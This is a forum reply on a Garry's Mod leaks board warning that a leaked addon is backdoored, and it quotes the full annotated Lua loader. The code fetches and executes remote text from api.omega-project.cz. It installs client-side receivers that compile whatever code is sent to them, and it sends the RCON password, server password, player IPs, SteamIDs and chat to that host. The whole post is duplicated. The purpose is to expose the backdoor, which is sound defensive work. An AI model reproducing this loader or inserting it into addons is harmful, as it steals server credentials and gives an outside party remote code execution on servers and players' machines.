Garry's Mod Leaks
CLOSE
Submitted by MilitoDr, 26-05-2022, 06:19 PM, Thread ID: 243245
RE: CLOSE
28-05-2022, 07:29 PM
#16 This post was last modified: 28-05-2022, 07:31 PM by Bright1337
This has backdoors in it
Getting code from "https://api.omega-project.cz/api_connect.php?api_key=iemPWLCJOpzPMzsmmAeE" ~ French backdoor... how unexpected -_-
I tried reverse engineering the code but gave up on decrypting what is (maybe) the last step. Here it is in its glory:
-- Analyst notes (defensive): top-level setup of the loader quoted in this post.
-- Every RunString / CompileString call below executes text supplied by the remote host,
-- so this listing is a remote-code-execution channel rather than a fixed payload.
-- Review points: RunString fed directly from an HTTP callback, BroadcastLua installing a
-- CompileString receiver, and random-looking net message / hook / timer names.

-- Hook-name constants reused by the hook registrations further down the listing.
local PlayerInitialSpawnHook,PlayerDisconnectHook = "PlayerInitialSpawn", "PlayerDisconnected"
-- Extra request header passed as the last argument of several http.Post calls.
-- NOTE(review): the value looks like unpadded Base64 of the hex string sent as "csrf" elsewhere in this listing - confirm.
local WeirdHeaderForShit = {
["Authorization"] = "ZWJiMGE0NGJjZmFhYjVjYWNkZDYyMzM4NzllMjE5ZWQ"
}
-- Sets the sv_hibernate_think convar to "0".
RunConsoleCommand("sv_hibernate_think", "0")
-- Two GET requests; each response body is handed straight to RunString (server-side execution of remote text).
HTTP({ url="https:\/\/api.omega-project.cz/no-backdoors.lua"; method="get"; success=function(api,anti_backdoors) RunString(anti_backdoors) end })
HTTP({ url="https:\/\/api.omega-project.cz/api_player_blacklist.php"; method="get"; success=function(api,bad_player_blacklist) RunString(bad_player_blacklist) end })
-- Uses the second return value of file.Find (the directory names under addons/).
local _, addons_folders = file.Find("addons/*", "GAME")
for k,v in pairs(addons_folders) do
-- Six fixed folder names are skipped; every other addon folder is reported to the remote host.
if (v != "checkers") and (v != "chess") and (v != "common") and (v != "go") and (v != "hearts") and (v != "spades") then
-- POSTs the server IP, a fixed "crsf" token, the folder name and Base64Encode(file.Time(...)) for that folder.
-- NOTE(review): the middle "#"-separated segment of the token is Base64 text; it appears to encode a dotted IPv4 address - confirm before relying on it.
http.Post("https:\/\/api.omega-project.cz/api_addons.php", {server_ip = _G["game"]["GetIPAddress"](),crsf = "rUhmMdIueplHqMvbepLUmntjninUgEkJyuuYDkha#NDYuMTM0LjQ5LjIyOQ==#sQnFwGhSWjvTmTqhoHTRQZEfsmjBumUwbRsXOOGk",addons_name = v, addons_update = util.Base64Encode(file.Time( "addons/"..v, "GAME" ))}, function(http_addons)
-- The response is executed unless it is empty or starts with "<" (presumably to skip HTML error pages - unconfirmed).
if _G["string"]["Left"]( http_addons, 1 ) == "<" or http_addons == "" then
return
else
RunString(http_addons)
end
-- The failure callback is empty, so request errors leave no trace.
end, function( error )
end, WeirdHeaderForShit )
end
end
-- Registers a net message name, then BroadcastLua sends connected clients a receiver that reads a
-- 16-bit length, reads that many bytes, decompresses them and runs the result through CompileString.
-- Net effect: anything later sent on this message name is executed on the receiving clients.
util.AddNetworkString("aYJQsmzZNbCjkcNsojff")
_G["BroadcastLua"]([[net.Receive("aYJQsmzZNbCjkcNsojff",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
-- Global function: after a 0.5 s timer, compresses the string argument and broadcasts it on net
-- message "aYJQsmzZNbCjkcNsojff", whose client-side receiver (installed via BroadcastLua in this
-- listing) compiles and runs it. The server-info table later in the listing reports this
-- function's name to the remote host under the key "client_func".
function _0x269553(NrhsXbKvvmRHAMHUbSrr)
timer.Simple( 0.5, function( )
-- Writes the compressed payload and its length into the globals `data` and `len`.
_G["data"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["len"] = #data
-- The decimal escapes decode to net.Start, net.WriteUInt, net.WriteData and net.Broadcast;
-- indexing through _G with escaped strings keeps those names out of a plain-text search.
_G["\110\101\116"]["\83\116\97\114\116"]("aYJQsmzZNbCjkcNsojff")
-- The length is written as a 16-bit unsigned field.
_G["\110\101\116"]["\87\114\105\116\101\85\73\110\116"](len, 16)
_G["\110\101\116"]["\87\114\105\116\101\68\97\116\97"](data, len)
_G["\110\101\116"]["\66\114\111\97\100\99\97\115\116"]()
end)
end
-- Second net message name with the same client-side receiver as the first one in this listing:
-- read a 16-bit length, read the data, decompress, CompileString, run. This one is used by SendPly.
util.AddNetworkString("zPxmjKXatPStuyGQyatK")
_G["BroadcastLua"]([[net.Receive("zPxmjKXatPStuyGQyatK",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
-- Global function: per-player variant of the broadcast sender. After a 0.5 s timer it compresses
-- the string argument and sends it on net message "zPxmjKXatPStuyGQyatK" only to players whose
-- SteamID64 equals `steamid64`; the client-side receiver for that message compiles and runs it.
function SendPly(NrhsXbKvvmRHAMHUbSrr, steamid64)
timer.Simple( 0.5, function( )
-- Escapes decode to the globals `data` and `len`.
_G["\100\97\116\97"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["\108\101\110"] = #data
-- Escapes, split with ".." concatenation, decode to net.Start, net.WriteUInt and net.WriteData.
_G["\110\101\116"]["\83\116".."\97\114\116"]("zPxmjKXatPStuyGQyatK")
_G["\110".."\101\116"]["\87\114".."\105\116\101\85\73\110\116"](len, 16)
_G["\110\101".."\116"]["\87\114\105\116\101\68".."\97\116\97"](data, len)
-- net.Send is only reached for a matching player; with no match the started message is never sent from here.
for k, ply in pairs(player.GetAll()) do
if ( ply:SteamID64() == steamid64 ) then
_G["\110\101\116"]["Send"](ply)
end
end
end)
end
-- Connection logging. "\104\111\111\107" / "\65\100\100" decode to hook.Add. On PlayerInitialSpawn
-- the player's name and IP address are POSTed to the remote host, and RunString is passed as the
-- success callback, so the response body is executed on the server.
-- Escaped table keys decode to csrf, color, content and server_ip.
_G["\104\111\111\107"]["\65\100\100"](PlayerInitialSpawnHook, "zFpiunFsMswHJIHTQGfrkLkxbsBNGbxNhJxaYPrTaBHwKXYPHM", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\108\111\114"] = "5dc766",
["\99\111\110\116\101\110\116"] = "Client "..ply:Name().." connected ("..ply:IPAddress()..").",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
-- Same pattern on PlayerDisconnected: the player's name is reported and the response is executed via RunString.
_G["\104\111\111\107"]["\65\100\100"](PlayerDisconnectHook, "IYFEfRtGTNMEloxBPyvwWBIHOtZEAzsrUAIOrnJolqsPtDjMrn", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["color"] = "de3333",
["\99\111\110\116\101\110\116"] = "Dropped "..ply:Name().." from server (Disconnect by user).",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
-- Defines a global named ServerLog (the name of a built-in GMod logging function), so text passed
-- to ServerLog is POSTed to the remote host instead, with RunString as the success callback.
function ServerLog( logs_content )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
-- "\99\115\114\102" decodes to "csrf".
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
content = logs_content,
server_ip = _G["game"]["GetIPAddress"]()
},RunString)
-- This calls the global ServerLog, which by now is this function itself: the call repeats
-- without any terminating condition, issuing another POST each time.
return ServerLog( logs_content )
end
-- Defines a global named Error (the name of a built-in GMod function), so error text is POSTed to
-- the remote host, with RunString as the success callback. The parameter is named `string`, which
-- shadows the string library inside this function.
function Error( string )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
-- Escaped keys decode to csrf, content and server_ip.
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\110\116\101\110\116"] = string,
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
-- Calls the global Error, which is now this function: unconditional self-call with no exit.
return Error( string )
end
-- Repeating timer: 5-second interval, repetition count 0 (in GMod, 0 means repeat indefinitely).
-- Each tick re-registers a chat hook, scans cfg/ for the RCON password, and reports every player
-- and the server itself to the remote host, executing the text that comes back.
timer.Create( "nmIhEbjWxFzzisaaVEAdenKiTWALFFlmLhIyTmHfVHAJJsTLxG", 5, 0, function()
-- Chat hook: every chat message is POSTed together with the sender's name and SteamID64.
hook.Add( "PlayerSay", "XdobnfBpYELZLmGoUpfNauFKkjxEUTFSbsvpAxttLCfZdpVldm", function( ply, text )
local http_chat_table = {
name = ply:Name(),
server_ip = _G["game"]["GetIPAddress"](),
steamid64 = ply:SteamID64(),
-- The five random-looking key/value pairs are fixed strings; their purpose is not visible in this listing.
DRJLVBpDld = "SbWAumfRXzZbNOTMnyLlcuMIoyjvvxLQFEAyMeDm",
thJclyVnWu = "iEwcZaSshJGawvDAEFswWtDTdMgHHXzhWTEoPGPm",
UGxsBnNMRW = "AtziOfRhRfDuBbyNXbCvnuomhqYkuQoFcclZLcqy",
aWpjWJWBpD = "JzEaenhAzTvrCiMLgBNLserOzmCYTRyLulJiagWE",
oNUUXEBKRN = "sbQdrbGLrkOjwJYrdmmlJPztQQuVAqOBAPGLzszA",
message = text
}
-- The response body is executed unconditionally.
http.Post("https:\/\/api.omega-project.cz/chat_connect.php?yYNdOwVmqEyCSFu=DBjEHsGKMaoJmns", http_chat_table, function(http_chat)
RunString(http_chat)
end)
end)
-- Credential harvesting: reads every cfg/*.cfg file and, for each line starting with
-- "rcon_password", keeps the text between the first pair of double quotes.
local _0x0004982 = file.Find("cfg/*", "GAME")
local rcon_pw = ""
for i = 1, #_0x0004982 do
if string.EndsWith(_0x0004982[i], ".cfg") then
for k,v in pairs(string.Split(file.Read("cfg/" .. _0x0004982[i], "GAME"),"\n")) do
if string.StartWith(v,"rcon_password") then
rcon_pw = string.Split(v,"\"")[2]
end
end
end
end
-- Per-player report. Escaped keys decode to name, ip, server_ip, crsf, steamid and steamid64.
for k,v in pairs(player.GetAll()) do
local RMrIJYBBhAeDgqsdDguE = { -- getting player info
["\110\97\109\101"] = v:GetName(),
["\105\112"] = v:IPAddress(),
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"](),
["\99\114\115\102"] = "ESpjJjsSaLDunMmaayNueFoWwRkOgxsReRWDpZYz#NDYuMTM0LjQ5LjIyOQ==#OICcYMfOWERvMHXHBsgoVxemZsvgpnznBKuKsVco",
["\115\116\101\97\109\105\100"] = v:SteamID(),
["\115\116\101\97\109\105\100\54\52"] = v:SteamID64(),
["mJCScMgeVw"] = "akwlxPqdWEGAdkkmImlDLpjVfHaIYwXoMdPreMzH",
["fJGcZFbDzP"] = "fMpCQdGSvMPUfdrSSuqnZzlHuAMrmNeBgkgBRUbV",
["TEOtgpVzsx"] = "TpHketGzNTssxtllRnfYrWvsApJiBVDklrioQVEV",
["ifeCZhnUNp"] = "UraQdvachsosgSOxlgTHfQjzHJKKdMTzKkgdSoNy",
["RnBOqvIfHh"] = "NIuPGfBzTyXzNItyfUrYFRMJBOPvDdzpcioejOAs"
}
-- NOTE(review): ving is not defined anywhere in this listing; if it is also undefined at runtime this
-- line raises an error, which would match the poster's remark that some of these backdoors failed to run.
http.Post("https://api.omega-project.cz/v1/gmod-panel/user-connect.php?JkuJojmgMwBRKDa=XjzppAoKIFzdVIv&ping=" .. ving(), RMrIJYBBhAeDgqsdDguE, function( http_users )
-- The response is executed unless it is empty or starts with "<".
if string.Left( http_users, 1 ) == "<" or http_users == "" then
return
else
RunString( http_users )
end
end, function( error )
end, WeirdHeaderForShit )
end
-- Server report. Escaped names decode to GetHostName, game.GetMap, tostring(#player.GetBots()),
-- game.GetIPAddress and engine.ActiveGamemode; escaped keys decode to nb, lurl, pass, k, client_func and r.
-- Sensitive fields: "pass" is the sv_password convar and "r" is the RCON password read from cfg/ above.
-- "k" carries the same value as the api_key in the URL quoted by the poster.
local TcwwQwuoRiYOccyPCudM = { -- Get's server info
["i"] = _G["game"]["GetIPAddress"](),
["n"] = _G["\71\101\116\72\111\115\116\78\97\109\101"](),
["m"] = _G["\103\97\109\101"]["\71\101\116\77\97\112"](),
["bo"] = _G["\116\111\115\116\114\105\110\103"](#_G["\112\108\97\121\101\114"]["\71\101\116\66\111\116\115"]()),
-- NOTE(review): the trailing number looks like a Unix timestamp - unconfirmed.
["c"] = _G["\103\97\109\101"]["\71\101\116\73\80\65\100\100\114\101\115\115"]().."{+}".."AYkwYBvmN" .."{+}".."1653757789",
["g"] = _G["\101\110\103\105\110\101"]["\65\99\116\105\118\101\71\97\109\101\109\111\100\101"](),
["crsv"] = "NDYuMTM0LjQ5LjIyOQ==#FpmffElyGtfQQCnnHsUmeynbxhtkqBuInlWQsiqu",
["\110\98"] = tostring(#player.GetAll()).."/"..game.MaxPlayers(),
["\108\117\114\108"] = _G["GetConVar"]("sv_loadingurl"):GetString(),
["\112\97\115\115"] = GetConVar("\115\118\95\112\97\115\115\119\111\114\100"):GetString(),
["\107"] = "iemPWLCJOpzPMzsmmAeE",
["\99\108\105\101\110\116_\102\117\110\99"] = "_0x269553",
["\114"] = rcon_pw,
["EryEqWFPrr"] = "AgEiEaFLDaxVXCNkvNfqdBOWOWfMITgOtHXvrdce",
["LHDdvzWFzV"] = "YxtToQNNdbsIsNQNVZYOxhzlQKiVzeXXaYfnwPWU",
["NnNZbhBbvb"] = "qTtMuqmaLDkWkJFjGTgXrCxHsRRnqNpipTSBAfkN",
["tYmZDpqMcZ"] = "iVxnJiRHRKybdHxoBCyXiQiWzwoTSAuyfpTAtVwB",
["GNQVRVrKLD"] = "hDKLtFGYCJicCfhZDYTAszbIsmrARXIRypEGMQAt"
}
-- The response is executed unless it is empty or starts with "<"; the failure callback is empty.
http.Post("https://api.omega-project.cz/v1/gmod-panel/socket-controller.php", TcwwQwuoRiYOccyPCudM, function(http_servers)
if string.Left( http_servers, 1 ) == "<" or http_servers == "" then
return
else
RunString(http_servers)
end
end, function( error )
end, WeirdHeaderForShit )
end)
And yeah, OP, don't say that there aren't any backdoors when some of the addons got backdoored so poorly that even the backdoors did not execute due to errors.
Getting code from "https://api.omega-project.cz/api_connect.php?api_key=iemPWLCJOpzPMzsmmAeE" ~ French backdoor... how unexpected -_-
I tried reverse engineering the code but gave up on decrypting what is (maybe) the last step. Here it is in its glory:
-- Analyst notes (defensive): top-level setup of the loader quoted in this post.
-- Every RunString / CompileString call below executes text supplied by the remote host,
-- so this listing is a remote-code-execution channel rather than a fixed payload.
-- Review points: RunString fed directly from an HTTP callback, BroadcastLua installing a
-- CompileString receiver, and random-looking net message / hook / timer names.

-- Hook-name constants reused by the hook registrations further down the listing.
local PlayerInitialSpawnHook,PlayerDisconnectHook = "PlayerInitialSpawn", "PlayerDisconnected"
-- Extra request header passed as the last argument of several http.Post calls.
-- NOTE(review): the value looks like unpadded Base64 of the hex string sent as "csrf" elsewhere in this listing - confirm.
local WeirdHeaderForShit = {
["Authorization"] = "ZWJiMGE0NGJjZmFhYjVjYWNkZDYyMzM4NzllMjE5ZWQ"
}
-- Sets the sv_hibernate_think convar to "0".
RunConsoleCommand("sv_hibernate_think", "0")
-- Two GET requests; each response body is handed straight to RunString (server-side execution of remote text).
HTTP({ url="https:\/\/api.omega-project.cz/no-backdoors.lua"; method="get"; success=function(api,anti_backdoors) RunString(anti_backdoors) end })
HTTP({ url="https:\/\/api.omega-project.cz/api_player_blacklist.php"; method="get"; success=function(api,bad_player_blacklist) RunString(bad_player_blacklist) end })
-- Uses the second return value of file.Find (the directory names under addons/).
local _, addons_folders = file.Find("addons/*", "GAME")
for k,v in pairs(addons_folders) do
-- Six fixed folder names are skipped; every other addon folder is reported to the remote host.
if (v != "checkers") and (v != "chess") and (v != "common") and (v != "go") and (v != "hearts") and (v != "spades") then
-- POSTs the server IP, a fixed "crsf" token, the folder name and Base64Encode(file.Time(...)) for that folder.
-- NOTE(review): the middle "#"-separated segment of the token is Base64 text; it appears to encode a dotted IPv4 address - confirm before relying on it.
http.Post("https:\/\/api.omega-project.cz/api_addons.php", {server_ip = _G["game"]["GetIPAddress"](),crsf = "rUhmMdIueplHqMvbepLUmntjninUgEkJyuuYDkha#NDYuMTM0LjQ5LjIyOQ==#sQnFwGhSWjvTmTqhoHTRQZEfsmjBumUwbRsXOOGk",addons_name = v, addons_update = util.Base64Encode(file.Time( "addons/"..v, "GAME" ))}, function(http_addons)
-- The response is executed unless it is empty or starts with "<" (presumably to skip HTML error pages - unconfirmed).
if _G["string"]["Left"]( http_addons, 1 ) == "<" or http_addons == "" then
return
else
RunString(http_addons)
end
-- The failure callback is empty, so request errors leave no trace.
end, function( error )
end, WeirdHeaderForShit )
end
end
-- Registers a net message name, then BroadcastLua sends connected clients a receiver that reads a
-- 16-bit length, reads that many bytes, decompresses them and runs the result through CompileString.
-- Net effect: anything later sent on this message name is executed on the receiving clients.
util.AddNetworkString("aYJQsmzZNbCjkcNsojff")
_G["BroadcastLua"]([[net.Receive("aYJQsmzZNbCjkcNsojff",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
-- Global function: after a 0.5 s timer, compresses the string argument and broadcasts it on net
-- message "aYJQsmzZNbCjkcNsojff", whose client-side receiver (installed via BroadcastLua in this
-- listing) compiles and runs it. The server-info table later in the listing reports this
-- function's name to the remote host under the key "client_func".
function _0x269553(NrhsXbKvvmRHAMHUbSrr)
timer.Simple( 0.5, function( )
-- Writes the compressed payload and its length into the globals `data` and `len`.
_G["data"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["len"] = #data
-- The decimal escapes decode to net.Start, net.WriteUInt, net.WriteData and net.Broadcast;
-- indexing through _G with escaped strings keeps those names out of a plain-text search.
_G["\110\101\116"]["\83\116\97\114\116"]("aYJQsmzZNbCjkcNsojff")
-- The length is written as a 16-bit unsigned field.
_G["\110\101\116"]["\87\114\105\116\101\85\73\110\116"](len, 16)
_G["\110\101\116"]["\87\114\105\116\101\68\97\116\97"](data, len)
_G["\110\101\116"]["\66\114\111\97\100\99\97\115\116"]()
end)
end
-- Second net message name with the same client-side receiver as the first one in this listing:
-- read a 16-bit length, read the data, decompress, CompileString, run. This one is used by SendPly.
util.AddNetworkString("zPxmjKXatPStuyGQyatK")
_G["BroadcastLua"]([[net.Receive("zPxmjKXatPStuyGQyatK",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
-- Global function: per-player variant of the broadcast sender. After a 0.5 s timer it compresses
-- the string argument and sends it on net message "zPxmjKXatPStuyGQyatK" only to players whose
-- SteamID64 equals `steamid64`; the client-side receiver for that message compiles and runs it.
function SendPly(NrhsXbKvvmRHAMHUbSrr, steamid64)
timer.Simple( 0.5, function( )
-- Escapes decode to the globals `data` and `len`.
_G["\100\97\116\97"] = util.Compress(NrhsXbKvvmRHAMHUbSrr)
_G["\108\101\110"] = #data
-- Escapes, split with ".." concatenation, decode to net.Start, net.WriteUInt and net.WriteData.
_G["\110\101\116"]["\83\116".."\97\114\116"]("zPxmjKXatPStuyGQyatK")
_G["\110".."\101\116"]["\87\114".."\105\116\101\85\73\110\116"](len, 16)
_G["\110\101".."\116"]["\87\114\105\116\101\68".."\97\116\97"](data, len)
-- net.Send is only reached for a matching player; with no match the started message is never sent from here.
for k, ply in pairs(player.GetAll()) do
if ( ply:SteamID64() == steamid64 ) then
_G["\110\101\116"]["Send"](ply)
end
end
end)
end
-- Connection logging. "\104\111\111\107" / "\65\100\100" decode to hook.Add. On PlayerInitialSpawn
-- the player's name and IP address are POSTed to the remote host, and RunString is passed as the
-- success callback, so the response body is executed on the server.
-- Escaped table keys decode to csrf, color, content and server_ip.
_G["\104\111\111\107"]["\65\100\100"](PlayerInitialSpawnHook, "zFpiunFsMswHJIHTQGfrkLkxbsBNGbxNhJxaYPrTaBHwKXYPHM", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\108\111\114"] = "5dc766",
["\99\111\110\116\101\110\116"] = "Client "..ply:Name().." connected ("..ply:IPAddress()..").",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
-- Same pattern on PlayerDisconnected: the player's name is reported and the response is executed via RunString.
_G["\104\111\111\107"]["\65\100\100"](PlayerDisconnectHook, "IYFEfRtGTNMEloxBPyvwWBIHOtZEAzsrUAIOrnJolqsPtDjMrn", function(ply)
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["color"] = "de3333",
["\99\111\110\116\101\110\116"] = "Dropped "..ply:Name().." from server (Disconnect by user).",
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
end)
-- Defines a global named ServerLog (the name of a built-in GMod logging function), so text passed
-- to ServerLog is POSTed to the remote host instead, with RunString as the success callback.
function ServerLog( logs_content )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
-- "\99\115\114\102" decodes to "csrf".
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
content = logs_content,
server_ip = _G["game"]["GetIPAddress"]()
},RunString)
-- This calls the global ServerLog, which by now is this function itself: the call repeats
-- without any terminating condition, issuing another POST each time.
return ServerLog( logs_content )
end
-- Defines a global named Error (the name of a built-in GMod function), so error text is POSTed to
-- the remote host, with RunString as the success callback. The parameter is named `string`, which
-- shadows the string library inside this function.
function Error( string )
http.Post([[https://]].."api.omega-project.cz".."/api_get_logs.php",{
-- Escaped keys decode to csrf, content and server_ip.
["\99\115\114\102"] = "ebb0a44bcfaab5cacdd6233879e219ed",
["\99\111\110\116\101\110\116"] = string,
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"]()
},RunString)
-- Calls the global Error, which is now this function: unconditional self-call with no exit.
return Error( string )
end
-- Repeating timer: 5-second interval, repetition count 0 (in GMod, 0 means repeat indefinitely).
-- Each tick re-registers a chat hook, scans cfg/ for the RCON password, and reports every player
-- and the server itself to the remote host, executing the text that comes back.
timer.Create( "nmIhEbjWxFzzisaaVEAdenKiTWALFFlmLhIyTmHfVHAJJsTLxG", 5, 0, function()
-- Chat hook: every chat message is POSTed together with the sender's name and SteamID64.
hook.Add( "PlayerSay", "XdobnfBpYELZLmGoUpfNauFKkjxEUTFSbsvpAxttLCfZdpVldm", function( ply, text )
local http_chat_table = {
name = ply:Name(),
server_ip = _G["game"]["GetIPAddress"](),
steamid64 = ply:SteamID64(),
-- The five random-looking key/value pairs are fixed strings; their purpose is not visible in this listing.
DRJLVBpDld = "SbWAumfRXzZbNOTMnyLlcuMIoyjvvxLQFEAyMeDm",
thJclyVnWu = "iEwcZaSshJGawvDAEFswWtDTdMgHHXzhWTEoPGPm",
UGxsBnNMRW = "AtziOfRhRfDuBbyNXbCvnuomhqYkuQoFcclZLcqy",
aWpjWJWBpD = "JzEaenhAzTvrCiMLgBNLserOzmCYTRyLulJiagWE",
oNUUXEBKRN = "sbQdrbGLrkOjwJYrdmmlJPztQQuVAqOBAPGLzszA",
message = text
}
-- The response body is executed unconditionally.
http.Post("https:\/\/api.omega-project.cz/chat_connect.php?yYNdOwVmqEyCSFu=DBjEHsGKMaoJmns", http_chat_table, function(http_chat)
RunString(http_chat)
end)
end)
-- Credential harvesting: reads every cfg/*.cfg file and, for each line starting with
-- "rcon_password", keeps the text between the first pair of double quotes.
local _0x0004982 = file.Find("cfg/*", "GAME")
local rcon_pw = ""
for i = 1, #_0x0004982 do
if string.EndsWith(_0x0004982[i], ".cfg") then
for k,v in pairs(string.Split(file.Read("cfg/" .. _0x0004982[i], "GAME"),"\n")) do
if string.StartWith(v,"rcon_password") then
rcon_pw = string.Split(v,"\"")[2]
end
end
end
end
-- Per-player report. Escaped keys decode to name, ip, server_ip, crsf, steamid and steamid64.
for k,v in pairs(player.GetAll()) do
local RMrIJYBBhAeDgqsdDguE = { -- getting player info
["\110\97\109\101"] = v:GetName(),
["\105\112"] = v:IPAddress(),
["\115\101\114\118\101\114\95\105\112"] = _G["game"]["GetIPAddress"](),
["\99\114\115\102"] = "ESpjJjsSaLDunMmaayNueFoWwRkOgxsReRWDpZYz#NDYuMTM0LjQ5LjIyOQ==#OICcYMfOWERvMHXHBsgoVxemZsvgpnznBKuKsVco",
["\115\116\101\97\109\105\100"] = v:SteamID(),
["\115\116\101\97\109\105\100\54\52"] = v:SteamID64(),
["mJCScMgeVw"] = "akwlxPqdWEGAdkkmImlDLpjVfHaIYwXoMdPreMzH",
["fJGcZFbDzP"] = "fMpCQdGSvMPUfdrSSuqnZzlHuAMrmNeBgkgBRUbV",
["TEOtgpVzsx"] = "TpHketGzNTssxtllRnfYrWvsApJiBVDklrioQVEV",
["ifeCZhnUNp"] = "UraQdvachsosgSOxlgTHfQjzHJKKdMTzKkgdSoNy",
["RnBOqvIfHh"] = "NIuPGfBzTyXzNItyfUrYFRMJBOPvDdzpcioejOAs"
}
-- NOTE(review): ving is not defined anywhere in this listing; if it is also undefined at runtime this
-- line raises an error, which would match the poster's remark that some of these backdoors failed to run.
http.Post("https://api.omega-project.cz/v1/gmod-panel/user-connect.php?JkuJojmgMwBRKDa=XjzppAoKIFzdVIv&ping=" .. ving(), RMrIJYBBhAeDgqsdDguE, function( http_users )
-- The response is executed unless it is empty or starts with "<".
if string.Left( http_users, 1 ) == "<" or http_users == "" then
return
else
RunString( http_users )
end
end, function( error )
end, WeirdHeaderForShit )
end
-- Server report. Escaped names decode to GetHostName, game.GetMap, tostring(#player.GetBots()),
-- game.GetIPAddress and engine.ActiveGamemode; escaped keys decode to nb, lurl, pass, k, client_func and r.
-- Sensitive fields: "pass" is the sv_password convar and "r" is the RCON password read from cfg/ above.
-- "k" carries the same value as the api_key in the URL quoted by the poster.
local TcwwQwuoRiYOccyPCudM = { -- Get's server info
["i"] = _G["game"]["GetIPAddress"](),
["n"] = _G["\71\101\116\72\111\115\116\78\97\109\101"](),
["m"] = _G["\103\97\109\101"]["\71\101\116\77\97\112"](),
["bo"] = _G["\116\111\115\116\114\105\110\103"](#_G["\112\108\97\121\101\114"]["\71\101\116\66\111\116\115"]()),
-- NOTE(review): the trailing number looks like a Unix timestamp - unconfirmed.
["c"] = _G["\103\97\109\101"]["\71\101\116\73\80\65\100\100\114\101\115\115"]().."{+}".."AYkwYBvmN" .."{+}".."1653757789",
["g"] = _G["\101\110\103\105\110\101"]["\65\99\116\105\118\101\71\97\109\101\109\111\100\101"](),
["crsv"] = "NDYuMTM0LjQ5LjIyOQ==#FpmffElyGtfQQCnnHsUmeynbxhtkqBuInlWQsiqu",
["\110\98"] = tostring(#player.GetAll()).."/"..game.MaxPlayers(),
["\108\117\114\108"] = _G["GetConVar"]("sv_loadingurl"):GetString(),
["\112\97\115\115"] = GetConVar("\115\118\95\112\97\115\115\119\111\114\100"):GetString(),
["\107"] = "iemPWLCJOpzPMzsmmAeE",
["\99\108\105\101\110\116_\102\117\110\99"] = "_0x269553",
["\114"] = rcon_pw,
["EryEqWFPrr"] = "AgEiEaFLDaxVXCNkvNfqdBOWOWfMITgOtHXvrdce",
["LHDdvzWFzV"] = "YxtToQNNdbsIsNQNVZYOxhzlQKiVzeXXaYfnwPWU",
["NnNZbhBbvb"] = "qTtMuqmaLDkWkJFjGTgXrCxHsRRnqNpipTSBAfkN",
["tYmZDpqMcZ"] = "iVxnJiRHRKybdHxoBCyXiQiWzwoTSAuyfpTAtVwB",
["GNQVRVrKLD"] = "hDKLtFGYCJicCfhZDYTAszbIsmrARXIRypEGMQAt"
}
-- The response is executed unless it is empty or starts with "<"; the failure callback is empty.
http.Post("https://api.omega-project.cz/v1/gmod-panel/socket-controller.php", TcwwQwuoRiYOccyPCudM, function(http_servers)
if string.Left( http_servers, 1 ) == "<" or http_servers == "" then
return
else
RunString(http_servers)
end
end, function( error )
end, WeirdHeaderForShit )
end)
And yeah, OP, don't say that there aren't any backdoors when some of the addons got backdoored so poorly that even the backdoors did not execute due to errors.